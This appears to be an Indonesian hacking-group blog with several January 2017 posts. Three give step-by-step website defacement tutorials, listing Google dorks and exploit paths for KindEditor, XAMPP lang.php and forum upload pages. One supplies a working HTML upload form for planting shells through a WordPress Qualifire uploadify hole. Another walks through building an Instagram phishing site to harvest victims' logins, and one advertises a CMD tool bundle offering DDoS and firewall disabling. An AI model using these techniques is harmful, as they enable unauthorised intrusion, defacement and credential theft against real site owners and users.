Tuesday, January 31, 2017

TOOLS CMD

Tags
Hello !!!


Pada kali ini saya kan berbagi tools cmd , tentunnya banyak sekali program yang kalian gunakan :)

Ada Apa Ajah sih di dalam tools ini ???

 [1]  Mengganti password dan User Windows
 [2]  Mengganti User Ke Admin
 [3]  DDOS ATTACK
 [4]  Menambah Koneksi Internet
 [5]  Mematikan Windows Firewall
 [6]  Mematikan Wifi
 [7]  Mematikan Hibernation
 [8]  Matrix CMD
 [9]  CMD berdisko
 [10] Main Tetris
 [11] TaskMngr
 [12] Like Dan Followers Instagram
 [13] Remote Pc Dengan Telnet
 [14] Melihat Ip Satu Jaringan 

Banyak Kan ? Langsung ajah di download di sini TOOLS CMD 

NB: Untuk Mendapatkan Password Silahkan Email Atau Chat Ke instagram Dab Oa line Kita

Instagram : @anoncyberteam
Oa Line     : @cpj4053b (Pake @ karna ini OA )

CATAT !!! SEMUA INI SAYA OPEN SOURCE CODE AGAR KALIAN BISA BELAJAR :)


THANKS FOR READING

REGARDS 


MR.TENWAP

Sunday, January 29, 2017

DEFACE Messange Board Forum

Tags
WELCOME ANONYMOUS CYBER TEAM !!!



Kali Ini Saya Akan Memposting
== DEFACE DENGAN Messange Board Forum ==
Langsung aja
Bahan
1.       Dork :
inurl:"/forum.php?forumid=
Inurl:"/forum_topic_create.php?"
2.       Script nya serah lu ( Nyimpen nya .Txt )


Searcing Drok Di Atas Serah Lu Mau Yang Mana
Nah Abis Itu Lu Pilih Web Mana Yang Mau Lu Deface

Kalo Udah Nemu Web Nya Isi Ngasal Kaga Papa , Tapi Bagian [ Verification ] jangan ngasal karna itu pertanyaan
Kalo  Udah Di Isi semua Jangan Lupa Masukin File Script Lu di [ Choose File ]
Abis Itu Klik [ Post Topic ]

Nah Akan Di Ahlikan Di Halaman Berikut nya seperti gambar di atas
Nah cara cek web deface nya gimana ?
Cara nya klik [Attached File ] nama sc lu misalkan [ ikkeh.txt ] di klik


Setelah Di Klik Dan BOOM Itu hasil Nya

Sekian Tutorial Dari Saya
Mohon Maaf Kalau kurang jelas
Terima Kasih
Follow instagram :
Gabung Grub FB
Subscribe YouTube
By : ZERO_S

Support : MR.Ten_Wap
                MDR01



Saturday, January 28, 2017

DEFACE DENGAN CARA KIND EDITOR

Tags
WELCOME ANONYMOUS CYBER TEAM !!!
                                                       



Kali Ini Saya Akan Memposting Cara
== DEFACE DENGAN CARA KIND EDITOR  ==

Langsung aja cusss

1.      Siapkan script lu tamvan.html

2.       Drok nya : inurl:examples/uploadbutton.html

3.       Buka salah satu web terserah kalian mau yang mana





4.       Klik uplod , cari script kalian yang buat tadi


Otomatis file terupload , nanti akan muncul test di bagian upload tadi .



5.       Setelah itu

Test yang ada di dalam upload tadi = /Public/Plug/kindeditor-4.1.4/attached/file/20170128/20170128171547_42280.html
Pastekan di belakang web tersebut.





Sekian Tutorial Dari Saya
Mohon Maaf Kalau kurang jelas
Terima Kasih
Follow instagram 

Gabung grub FB

Subscribe Youtube

By : ZERO_S
Support : MR.Ten_Wap




Friday, January 27, 2017

Deface Dengan Methode Local Write Access

Tags


HELLO ANONYMOUS !!!
KEMBALI LAGI BERSAMA SAYA MR.TEN_WAP

PADA KESEMPATAN KALI INI KITA AKAN MEMBAHAS TUTORIAL DEFACE MENGGUNAKAN METHOD LOCAL WRITE ACCCES !!! MANTAF DJIWA

Hasil gambar untuk xampp 

Okeh langsung saya kami jelaskan , pertama kalian harus memiliki dork dan exploit agar mempermudah mendapatkan bug pada web

Untuk Dork Silahkan cek dibawah ini
====
Dork :
   inurl:/xampp/lang.php
   inurl:/security/lang.php
   inurl:/xampp/splash.php
   inurl:xampp/index.php intitle:XAMPP
====
Dan ini untuk exploitnya !!!

====
exploit : /lang.php?Pentest_By_MR.TEN_WAP___ANONCYBERTEAM
====
NB : Untuk ==> Pentest_By_MR.TEN_WAP___ANONCYBERTEAM <== Bisa kalian ubah sesuai keinginan kalian !!!

Dork bisa kalian kreasikan dan kembangkan sesuai imajinasi kalian , untuk vidio tutorial bisa di cek di youtube kami :)
 


Thanks For Reading Guys

Writed By Mr.Ten_Wap

Thursday, January 26, 2017

DEFACE DENGAN METHOD WP-QUALIFIER

Tags
WELCOME ANONYMOUS CYBER TEAM !!!




Kali Ini Saya Akan Memposting

===DEFACE DENGAN METHOD WP-QUALIFIER===


DORK
inurl:"/wp-content/themes/qualifire"
inurl:"/wp-content/themes/qualifire" site:.fr
( kembangin lagi ya drok nya jangan manja )

Kalo udh ketemu web nya  Masukin exploit
Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Contoh :
site.tamvan.id/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php


Vuln? biasanya Blank putih atau muncul angka/huruf gak jelas ,
tapi kalo 404 not found berarti ikhlasin aja hehehe

Script Upload CSRF:
NOTE  :

<form
action="http://site.tamvan.id/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>




* Save As: .html (contoh.html)
* edit/ganti site.tamvan.id ~> menjadi link target yang sobat temukan

- Lalu buka .html yang sudah kalian save

- klik browser (pilih shell , pilih script deface , pilih gambar , atau file txt)
*seterah kalian mau upload apa, tapi disini saya akan upload file gambar (png, jpg, gift, dll)

BOOM success
Shell Akses:
http;//site.tamvan.id/namashell.php

karna saya upload gambar jadinya kek gitu:
http://site.tamvan.id/ hacked_zero_s .jpg



Zero_S
 http://www.depal.it/hacked_zero_s.jpg

Mr.Ten_Wap 


Sekian Tutorial Dari Saya
Mohon Maaf Kalau kurang jelas
Terima Kasih


Follow instagram



Subscribe YouTube

By : ZERO_S


Support : MR.Ten_Wap 

Monday, January 2, 2017

Tutor Phising Instagram

Tags
WELCOME ANONYMOUS CYBER TEAM !!!


Kali ini saya akan memposting cara membuat phising instagram
-          Phising instagram tidak jauh berbeda seperti membuat phising facebook hanya perbedaan nya di script yang di pakai

Jika belum mengetahui cara-cara nya dari membuat hosting sampai memasukan file saya akan jelaskan kembali
LANGKAH 1
Langkah pertama ini kita download alat pendukung membuat phising nya .
1.       Download script phising nya dulu DI SINI CUK
2.       Kalau sudah di download ekstaks file scipt nya tadi

3.       Kalo sudah di ekstaks akan muncul folder seperti ini 
LANGKAH 2

Langkah ke 2 ini kita akan membuat hosting dan subdomain atau bisa di bilang membuat web phising nya .

1.       Buka google crome / mozila atau dll lalu searcing hostinger.co.id
2.       Klik login
3.       Setelah klik login anda akan di alihkan ke web selanjutnya
4.       Login menggunakan akun gmail
5.       Setelah login melalui akun gmail, akan muncul gambar seperti ini , buatlah hosting yang gratis saja lalu klik order.
6.       Setelah di klik order, kta akan di alihkan ke tab selanjutnya setelah di alihkan lalu klik langsung “ LANJUT KE CHECKOUT “ yang ada di paling bawah .
7.       Nah setelah itu , lalu centang yang  ((1)“ saya setuju dengan “ , kalau sudah di centang lalu klik (2)  selanjut nya.
8.       Setelah mengikuti cara” di atas maka akun hosting anda sudah di buat tinggal buat domain dan menaruh file agar phising berjalan. Lalu kalian langsung klik beranda.
9.       Setelah di klik beranda  , setelah itu langsung klik setup.
10.   Setelah di klik setup , nah dari sini kita akan membuat domain untuk mendukung phising bisa di gunakan.
Langkah” isi domain nya
1.       klik Subdomain Gratis
2.       Nama subdomain : isi subdomain ini semenarik mungkin agar korban masuk ke perangkap phising kalian ( contoh : instagramfollowes.pe.hu) tidak di spasi
 [ NOTE : karna hostinger sudah banyak di guakan kadang” suka tidak bisa buat nama subdomain karna sudah di pakai orang lain coba nama subdomain nya di ganti )
3.       Pilih Lokasi Server : Klik Europe ( UK )
4.       Password : isi seterah kalian
Setelah di lakukan semua klik “ SETUP “

Nah langkah” membuat akun hosting dan subdomain sudah selesai , setelah ini kita akan masuk memasukan file yang di ekstaks ke dalam akun hosting / subdomain yang kita buat tadi dan mengedit file yang telah kita ekstrak tadi.

LANGSUNG AJA LANGKAH”NYA

NOTE: pada tahap memasukan file manajer tidak bisa terlalu lama karna akan terjadi server eror
[ Sebelum melanjutkan nya terlebih dahulu kita mengedit script phising yang sudah di ekstrak tadi , buka file phising yang sudah di ekstrak ]
lalu klik yang bacaan login  

Lalu akan muncul notepad seperti ini
Setelah muncul notepad , lalu hapus bacaan [ganti dengan email kamu] dan [masukin email lo disini], lalu kalian ganti dengan email kalian [ harus sama ya ]



Setelah di rubah setelah itu di save , yang kalian edit sudah selesai ]
Kita lanjut ke tahap berikutnya

1.       Sehabis kalian memasukan nama subdomain , pilih server, password , dan klik setup  . nah lalu klik hosting .
2.       Setelah klik hosting Nah habis itu kalian  , (1) klik subdomain kalian yang kalian buat , (2) setelah di klik akan muncul file”  .
Klik kelola
3.       Setelah di klik kelola 
Lalu scroll ke bawah cari file namanya [ FILE MANAJER ]
Setelah di klik FILE MANAJER 
4.       Setelah itu kalian klik public html
Tunggu sebentar lalu akan muncul file
5.       Setelah itu kalian klik upload
6.       Setelah menekan upload akan keluar gambar seperti ini , nah di sini file” phising tadi di masukan

7.       Untuk memasukan file” tersebut klik choose file yang di sebelah kiri [ FILE YANG DI MASUKAN KE CHOOSE FILE = index , login , success ]
8.       Setelah memasukan file” ke dalam upload public html setelah itu klik ceklis warna hijau di atas sebelah tanda back warna biru
9.       Setelah di  klik ceklis warna hijau  , lalu klik tanda back biru yang di atas
10.   Setelah di klik tanda back biru file yang kita upload di choose file akan muncul di public html
11.   Dan BOOM phising kalian sudah jadi kalau mau cek file sudah jadi atau belum tinggal searcing instagramfollowes.pe.hu



 Note:  kalau korban masuk perangkap kita , ntar ada pemberitahuan dari email 

Thanks For Reading Ya Guys :)
jika belum mengerti silahkan komentar saja 

FOLLOW Instagram

Grub Fb

Subscribe Youtube


jika ingin berminat bergabung silahkan DM instagram @anon_cyber_team
Bila ada kekurangan atau file bermasalah silahkan Komentar / Hub INSTAGRAM kami J
Terima Kasih Telah Membaca J




Edu-Secure